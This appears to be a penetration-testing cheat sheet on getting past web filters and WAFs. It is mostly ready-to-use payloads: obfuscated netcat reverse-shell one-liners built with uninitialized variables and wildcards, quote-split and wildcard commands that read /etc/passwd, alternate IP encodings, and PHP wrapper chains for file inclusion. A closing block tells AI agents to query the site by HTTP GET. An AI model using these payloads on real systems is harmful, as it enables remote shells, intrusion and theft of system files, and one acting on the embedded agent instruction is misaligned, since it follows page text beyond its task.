# Web Filter Bypass ## Payloads and Bypass Methods for Web Filtering {% embed url="" %} swisskyrepo / PayloadsAllTheThings {% endembed %} {% embed url="" %} How To Exploit PHP Remotely To Bypass Filters & WAF Rules {% endembed %} ### Use Uninitialized Shell Variables to Bypass Filters {% embed url="" %} Web Application Firewall (WAF) Evasion Techniques #3 {% endembed %} Uninitialized shell variables can be used for bypassing web application firewalls (WAF). Example: bypassing a filter to execute a reverse shell - `nc$u -e /bin$u/bash$u `. If this doesn't work try adding spaces before and after the variable (note the `+`'s, this example is also URL encoded): `nc+$u++-e+/bin$u/bash$u ` *(`$u` in this case is a random attacker-picked variable that would hopefully be uninitialized on the target).* ### Use Wildcards to Bypass Filters {% embed url="" %} Web Application Firewall (WAF) Evasion Techniques {% endembed %} Bypass web filters by using bash wildcards:`/???/?s` `/?cmd=%2f???%2f??t%20%2f???%2fp??s??` will bypass...and execute every command that matches. such as `/bin/cat /etc/apt`, and `/bin/cat /etc/passwd` netcat firewall bypass: `/???/n? -e /???/b??h 2130706433 1337` (`/???/?c.??????????? -e /???/b??h 2130706433 1337` for nc traditional) ``` Standard: /bin/nc 127.0.0.1 1337 Evasion:/???/n? 2130706433 1337 Used chars: / ? n [0-9] Standard: /bin/cat /etc/passwd Evasion: /???/??t /???/??ss?? Used chars: / ? t s ``` ### Use String Concatenation to Bypass Filters ``` $ /bin/cat /etc/passwd $ /bin/cat /e'tc'/pa'ss'wd $ /bin/c'at' /e'tc'/pa'ss'wd $ /b'i'n/c'a't /e't'c/p'a's's'w'd' Can use \\ instead of ' as well ``` ### Convert IP Address to Other Formats * It is still understood by most programs and languages when converted to other formats, such as decimal, and avoids `.` character in filtered HTTP requests: `127.0.0.1 = 2130706433` ``` http://127.0.0.1 #0 Concatenation http://127.0.1 http://127.1 #Decimal http://2130706433 #Hexidecimal http://0x7f000001 #Dotted Hexidecimal http://0x7f.0x0.0x0.0x1 http://0x7f.0x000001 http://0x7f.0x0.00x0001 #Others (need descriptions) http://0177.00.00.01 http://000000177.0000000.000000000.0001 http://017700000001 http://%31%32%37%2e%30%2e%30%2e%31 http://127.0x0.000000000.0x1 http://①②⑦.⓪.⓪.① ``` Injecting IPs when `.` is disallowed: convert dotted-decimal format to decimal value - [`ip2dh`](https://github.com/4ndr34z/MyScripts/blob/master/ip2dh.py) ### LFI / RFI by Bypassing Filters Using Wrappers From [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/73aa26ba6891981ec2254907b9bbd4afdc745e1d/File%20Inclusion/README.md#lfi--rfi-using-wrappers) `php://filter/` has multiple ways to bypass PHP input filters ;These can be chained with `|` or `/` : zip, data, expect, input, phar; many more different wrappers to try! ```php /zlib.deflate/read=string.rot13/convert.base64-encode/convert.iconv.utf-8.utf-16/resource= ``` ## --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://zweilosec.gitbook.io/hackers-rest/web/web-notes/web-filter-bypass.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.